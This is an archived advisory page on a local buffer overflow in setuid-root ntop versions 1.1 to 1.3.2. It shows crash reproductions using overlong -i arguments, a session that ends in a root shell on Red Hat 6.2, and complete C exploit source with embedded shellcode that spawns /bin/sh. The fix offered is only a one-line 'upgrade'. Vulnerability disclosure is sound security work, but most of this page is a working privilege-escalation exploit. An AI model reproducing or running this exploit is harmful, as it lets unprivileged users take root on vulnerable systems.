TUCoPS :: Unix :: General :: ntop3-2.htm

Ntop Exploitable Buffer Overflow 
Vulnerability

    ntop

Affected

    ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2

Description

    Christophe  Bailleux  found  following.   All  ntop  versions  are
    vulnerabled to local buffer  overflow attack in there  -i options.
    Ntop must be owned by root  with a setuid bit for the  attacker to
    gain root privileges.

    a) ntop 1.1

        tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
        ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

        Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.1$

    b) ntop 1.2a7

        tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$

    c) ntop 1.3.1

        tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$

    d) ntop 1.3.2

        tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

        24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
        24/Oct/2000:12:32:16 Listening on
        [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
        24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
        24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
        24/Oct/2000:12:32:16 Initialising...
        Segmentation fault
        tshaw:/home/cb/ntop-1.3.2$

    Exploit was tested on redhat 6.2 (Zoot) where ntop is installed by
    default with the bit setuid root

        [cb@nux cb]$ cat /etc/redhat-release
        Red Hat Linux release 6.2 (Zoot)
        [cb@nux cb]$ rpm -qf /sbin/ntop
        ntop-1.1-1
        [cb@nux cb]$ id
        uid=535(cb) gid=535(cb) groups=535(cb)
        [cb@nux cb]$ ./expl

        ntop v.1.1 MT [i586-pc-linux-gnu] listening on
        ..............................

        Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
        bash#
        bash# id
        uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
        bash# exit
        [cb@nux cb]$

    Exploit:

    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>
    
    #define LEN 208
    
    int main (int argc, char **argv)
    {
      char buf[LEN + 12];
      int  ret = 0xbffffba0;
      int  *p;
    
      char code[]=
          "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
          "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
      if (argc > 1) {
        ret += atoi(argv[1]);
        fprintf(stderr, "Using ret %#010x\n", ret);
      }
    
      memset(buf, '\x90', LEN);
      memcpy(buf + LEN - strlen(code), code, strlen(code));
    
      p = (int *) (buf + LEN);
    
      *p++ = ret;
      *p++ = ret;
      *p   = 0;
    
     execl("./ntop", "ntop", "-i", buf, NULL);
    
    }

Solution

    Upgrade to latest version.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH